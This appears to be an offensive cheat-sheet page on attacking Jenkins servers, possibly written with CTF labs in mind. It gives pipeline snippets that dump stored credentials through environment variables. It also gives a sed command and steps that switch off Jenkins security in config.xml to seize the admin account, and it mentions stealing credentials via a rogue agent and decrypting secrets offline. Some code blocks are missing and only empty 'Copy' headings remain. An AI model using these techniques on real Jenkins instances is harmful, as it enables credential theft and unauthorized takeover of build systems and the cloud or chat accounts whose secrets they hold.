Jenkins

Extract secrets from credential store

Need to know the name and type of the secret.

Copy

withCredentials([usernamePassword(credentialsId: 'flag2', usernameVariable: 'USERNAME', passwordVariable: 'PASS')]) {
    sh '''
        env #Search for USERNAME and PASS
    '''
}

withCredentials([string(credentialsId: 'flag1', variable: 'SECRET')]) {
    sh '''
        env #Search for SECRET
    '''                 
}

withCredentials([usernameColonPassword(credentialsId: 'mylogin', variable: 'USERPASS')]) {
    sh '''
        env # Search for USERPASS
    '''
}

# You can also load multiple env variables at once
withCredentials([usernamePassword(credentialsId: 'amazon', usernameVariable: 'USERNAME', passwordVariable: 'PASSWORD'),
                 string(credentialsId: 'slack-url',variable: 'SLACK_URL'),]) {
     sh '''
        env
    '''
}

All the credential types: https://www.jenkins.io/doc/pipeline/steps/credentials-binding/

Abuse agent admin privilege

You can steal credentials (not key), via create controlled jenkins agent

Configure ssh_mitm.

Start job on master node

Copy

Dump secrets from credentials Groovy

Copy

Create new admin user

1. Access the Jenkins config.xml file in /var/lib/jenkins/config.xml or C:\Program Files (x86)\Jenkis\

2. Search for the word <useSecurity>true</useSecurity>and change the word **true ** to false.

   1. sed -i -e 's/<useSecurity>true</<useSecurity>false</g' config.xml

3. Restart the Jenkins server: service jenkins restart

4. Now go to the Jenkins portal again and Jenkins will not ask any credentials this time. You navigate to "Manage Jenkins" to set the administrator password again.

5. Enable the security again by changing settings to <useSecurity>true</useSecurity> and restart the Jenkins again.

Decrypt Jenkins secrets offline

If you have dumped the needed passwords to decrypt the secrets, use this script to decrypt those secrets. Also need secrets/master.key or secrets/hudson.util.Secret

Copy